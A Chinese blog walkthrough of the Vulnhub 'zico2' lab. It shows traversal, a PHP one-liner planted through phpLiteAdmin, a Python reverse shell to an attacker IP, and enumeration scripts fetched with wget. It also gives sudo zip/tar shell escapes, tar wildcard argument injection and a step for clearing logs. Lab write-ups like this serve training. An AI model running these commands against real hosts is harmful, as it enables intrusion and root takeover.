【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

最新推荐文章于 2023-07-29 13:15:00 发布
最新推荐文章于 2023-07-29 13:15:00 发布
阅读量736 收藏
点赞数
分类专栏: vulnhub百个项目渗透 文章标签: 数据库 sqlite 安全 vulnhub 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127129180
版权

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月1日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

二、web突破

信息收集

在这里插入图片描述

发现开启了22可以登录ssh,80一个web,111忽略不计先

在这里插入图片描述

这应该是用户名

在这里插入图片描述

没啥发现,开扫

在这里插入图片描述

目录遍历,利用

在这里插入图片描述

目录遍历存在,可行,按照AWVS给出的方法去利用即可

在这个同时,也用dirb扫一下目录

locate big.txt
然后复制上
dirb http://192.168.247.159 [字典绝对路径]
忘记复制了,clear了

在这里插入图片描述

可以看到还是有点东西的,vendor啊,这都是以前有过敏感信息泄露的目录,但是最显眼的还要属这个dbadmin了吧
进去了以后就一个子目录,点一下,就是下面的页面
弱口令直接进,也没法爆破估计,连正儿八经的web页面都空荡荡的,也没密码本,ctf再怎么样也会有解题方法的

在这里插入图片描述

看到了这个版本,就去搜一下

在这里插入图片描述

果然,那就看看

在这里插入图片描述

最左边先新建一个数据库,然后点击新的数据库,再点右边的红框,随便输,然后go

在这里插入图片描述

然后在红框写个一句话

里面全是一句话

在这里插入图片描述

然后就可以看到已经写进去了,接下来就是找目录,才能去执行,我发现左边的红框那个很有可能就是路径,那就实验一下,直接读肯定是不行的(最基本的安全性要有吧。。。)那就顺其自然的想到了之前的目录遍历漏洞,用那个读取然后传参,参数带着命令

在这里插入图片描述

成功

在这里插入图片描述

nc -vlp 6666

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.253.166",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty; pty.spawn("/bin/bash")'

三、提权

信息枚举

python -m http.server 8082
wget http://192.168.247.129:8082/linpeas.sh
wget http://192.168.247.129:8082/les.sh

chmod +x linpeas.sh
另一个也赋权
./linpeas.sh
执行就行

linpeas.sh枚举结果

在这里插入图片描述
在这里插入图片描述

/home/zico/wordpress/wp-config.php
define('DB_NAME', 'zico');
define('DB_USER', 'zico');
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
define('DB_HOST', 'zico');

les.sh信息枚举结果

在这里插入图片描述

谷歌搜一下,官方数据库中这是利用方法,

在这里插入图片描述

拿到了root

在这里插入图片描述

别的提权思路

在我打完的时候习惯性看别的师傅的WP,因为这个很简单,我打的也很快,所以我觉得应该还有别的思路
他们利用二进制提权,但是我的sudo -l报这个错,用不了,就搬运一下别的师傅
在这里插入图片描述

sudo 提权 zip

ssh zico@192.168.253.174
sWfCsfJSPV9H3AmQzw8

sudo -l
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip

二进制:
https://gtfobins.github.io/gtfobins/zip/
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT ‘sh #’

或者使用命令:
使用zip命令中可用的–unzip-command选项在压缩文件时运行bash shell:
sudo zip /tmp/1.zip /home/zico/dayu -T --unzip-command=“sh -c /bin/bash”

sudo提权tar

https://gtfobins.github.io/gtfobins/tar/

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

tar另外一种用法:

find提权 (其实这里也是使用了tar进行执行提权,然后转到find,重点是find执行命令提权)
查看是否存在find命令setuid执行权限:
find / -perm -4000 2>/dev/null | grep find

通过tar命令创建find命令具备setuid执行权限:
cd /tmp
echo “chmod u+s /usr/bin/find” > shell.sh
echo “” > “–checkpoint-action=exec=sh shell.sh”
echo “” > --checkpoint=1 -----创建两个文件,方便通过tar命令将此文件当做命令去执行!
sudo tar cf archive.tar *

创建完成确认find命令是否成功被赋予setuid权限:
find / -perm -4000 2>/dev/null | grep find
执行find命令开始提权
find /tmp -exec sh -i ;

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
甄选靶场Vulnhub百个项目渗透——项目三十:Node-1(源码审计)
人间体佐菲的博客
10-02 769
甄选靶场Vulnhub百个项目渗透——项目三十:Node-1(源码审计)
甄选靶场Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)
人间体佐菲的博客
09-26 988
Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)信息安全,网络安全,渗透测试
甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核
xnxqwzy的博客
07-29 2853
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核(没有gcc的环境的替代方法)
甄选靶场Vulnhub百个项目渗透——项目三十一:SpyderSecChallenge(静态页面的分析突破,js加密混淆,视频文件分析)
人间体佐菲的博客
10-05 702
甄选靶场Vulnhub百个项目渗透——项目三十一:SpyderSecChallenge(静态页面的分析突破,js加密混淆,视频文件分析)
VMware的Zico2虚拟机
05-12
VMware的Zico2虚拟机
Acme-2zicon:Acme-2zicon 的只读发布
07-02
名称Acme::2zicon - 这是新的 $module概要 use Acme::2zicon;my $nizicon = Acme::2zicon->new;# retrieve the members on their activitiesmy @members = $nizicon->members;# retrieve the members under some ...
Zico-Shop.xmind
11-25
Zico-Shop.xmind
zcli-004:ZoomlaCli Studio项目应用,基于节点,一种在网站后台即可直接获取git和npm源码,一键配置接口数据并直接生成智能门户的解决方案-源自18年技术积累,alexa !逐浪CMS团队
03-22
[目录]Zoomla!逐浪CMS卓越出品Zoomla-Cli-Studio开发栈004:大屏动画一种在网站后台可以直接获取git和npm子系统,一键配置接口数据并直接生成智能门户的解决方案-源自18年技术积累,alexa中文排名第一的Zoomla!...
甄选靶场Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod
人间体佐菲的博客
10-10 890
甄选靶场Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 640
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
Vulnhub靶场渗透-zico2
paidx0
10-01 1207
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
Vulnhub靶机渗透zico2
realmels的博客
07-04 585
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件上传绕过.
vulnhub zico2 靶场练习
鸥鹭忘机
12-22 3373
前言 这次练习的靶机是vulnhub平台的zico2。下载地址为:https://www.vulnhub.com/entry/zico2-1,210/。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击zico2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集信息 通过arp协议扫描局域网,又快又准,但是只能扫描局域网内的ip。 arp-scan -l 发现靶机的IP地址为 `192.168.
vulnhub渗透系列之zico2(内含zip
来到了学渣的博客
02-02 2125
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种的方法(python反shell和zip、php反shell和 )并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
Vulnhub靶机zico2渗透
xingjinhao123的博客
02-27 334
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/ 目标是获取root的目录下的flag,难度是中级 运行环境: 靶机:网络设为NAT模式,IP地址为:192.168.174.133 攻击机:同网段下的kali Linux,IP地址为:192.168.174.128 运行靶机 开始渗透 获取IP地址 扫描端口 访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含 使用工具扫描发现确实存在目录的漏洞,并
Vulnhub:Zico2靶机
qq_43884092的博客
03-25 147
view.php测试出文件包含,dbadmin目录存在phpliteadmin,搜索该cms,发现该版本存在代码注入,通过弱口令admin进入phpliteadmin后台,写入一句话,在/home/zico/wordpress/wp-config.php发现zico用户的密码
zico2靶机
薛定谔嘚喵博客
03-19 343
文件包含,远程php代码执行漏洞,一句话木马
Cannot read properties of undefined (reading 'gotoPage')
最新发布
09-01
根据您供的引用信息,报错信息示是"Cannot read properties of undefined (reading 'gotoPage')"。这个错误通常出现在尝试从未定义的对象上读取属性时。可能的原因是,代码中某个对象未被正确初始化或赋值,导致无法访问该对象的属性。 要解决这个问题,您可以按照以下步骤进行排查和修复: 1. 首先,请确保代码中涉及到的对象都已经正确地初始化或赋值。检查相关代码,特别是与“gotoPage”属性相关的代码,确认是否正确地创建了该对象。 2. 确认您使用的变量或方法名称是否正确。在报错信息中,有时会示某个属性或方法不存在,这可能是由于拼写错误或者是错误地引用了其他对象导致的。请仔细检查代码中涉及到的变量名或方法名。 3. 如果您在复制时间查询条件时遇到类似的错误,请确保变量名保持一致。根据引用中的原因分析,可能是由于复制时变量名出现了错误。 如果以上步骤都没有找到问题所在,建议您检查代码的上下文和运行环境,查看是否还有其他可能导致该错误的因素。<span class="em">1</span> #### 引用[.reference_title] - *1* [帆软填报CustomJSError报错解决](https://blog.csdn.net/zico_a/article/details/107150639)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值